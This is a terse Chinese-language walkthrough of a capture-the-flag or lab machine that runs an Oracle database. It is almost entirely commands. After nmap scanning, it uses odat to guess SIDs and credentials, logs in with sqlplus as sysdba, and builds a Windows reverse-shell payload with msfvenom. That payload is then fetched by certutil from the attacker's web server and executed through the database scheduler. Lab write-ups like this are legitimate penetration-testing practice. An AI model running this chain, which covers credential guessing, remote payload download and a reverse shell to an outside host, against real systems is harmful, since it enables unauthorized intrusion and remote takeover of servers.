nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)

http都没有查看到可以利用的点

这边直接是看看orcal的漏洞

odat sidguesser -s 10.129.95.188

查看SIDs

我们找到了，然后测试是否可以打开

odat tnspoison -s 10.129.95.188 -d XE --test-module

下一步就是猜测凭证

sudo odat passwordguesser -d XE -s 10.129.95.188 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt

发现找到凭证

使用找到的凭证，登录8080，发现登录不了

因为靶机打开了5985，我就尝试登录5985，发现登陆不了

接下来就是登录数据库

这里的as sysdba 就是以管理员的身份命令

sqlplus scott/tiger@10.129.95.188:1521/XE as sysdba

生成一个监听的挡案

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.43 LPORT=5555 -f exe >shell.exe

然后上传

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe c:\users\public\shell.exe" --sysdba

上传完之后执行

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "c:\users\public\shell.exe" --sysdba